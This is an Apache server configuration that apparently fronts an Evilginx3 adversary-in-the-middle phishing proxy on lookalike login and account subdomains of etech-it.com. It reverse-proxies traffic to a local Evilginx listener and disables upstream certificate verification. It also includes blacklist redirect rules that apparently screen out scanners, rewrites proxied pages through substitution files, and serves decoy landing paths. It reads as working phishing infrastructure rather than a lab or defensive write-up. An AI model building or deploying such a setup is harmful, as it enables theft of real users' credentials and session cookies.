
# LOCATION: /etc/apache2/sites-available/000-default.conf


<VirtualHost *:443>
	ServerName login.etech-it.com
    ServerAlias login.etech-it.com account.etech-it.com
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile /etc/letsencrypt/live/etech-it.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/etech-it.com/privkey.pem
    ProxyPreserveHost On

    Alias /home /var/www/home
    <Directory /var/www/home>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ProxyPass /home !


    Alias /landing /var/www/landing
    <Directory /var/www/landing>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ProxyPass /landing !


    Alias /btb /var/www/btb
    <Directory /var/www/btb>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ProxyPass /btb !



    ProxyPass / https://127.0.0.1:8443/
    ProxyPassReverse / https://127.0.0.1:8443/
    
    # Remove the X-Frame-Options header
    #Header always unset X-Frame-Options
    #Header set X-Frame-Options "SAMEORIGIN"

    # If you also want to handle other security headers:
    #Header always unset Content-Security-Policy


    # Add CORS headers (optional if you want to access it from other domains)
    Header set Access-Control-Allow-Origin "*"

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""




	# -------> ALLOW BLACKLISTS <------- #
    Include /etc/apache2/redirect.rules

    # Enable output buffering and content substitution
    SetOutputFilter INFLATE;SUBSTITUTE;DEFLATE

    # Substitutions (excluding /home, /landing, /btb, and /)
    <LocationMatch "^/(?!btb|landing|home|($|\?))">
        Include /etc/apache2/conf-available/substitutions.conf
    </LocationMatch>

    # Additional Substitutions only for /?auth=2
    <LocationMatch "^/$">
        <If "%{QUERY_STRING} =~ /auth=2/">
            Include /etc/apache2/conf-available/substitutions.conf
            # Additional substitutions, if any, can be added here without repeating the common ones
        </If>
    </LocationMatch>

</VirtualHost>



# Handle Base Domain separately

<VirtualHost *:443>
	ServerName etech-it.com
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile /etc/letsencrypt/live/etech-it.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/etech-it.com/privkey.pem
    ProxyPreserveHost On

    DocumentRoot /var/www/home
    
    <Directory /var/www/home>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    # Add CORS headers (optional if you want to access it from other domains)
    #Header set Access-Control-Allow-Origin "*"
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""

</VirtualHost>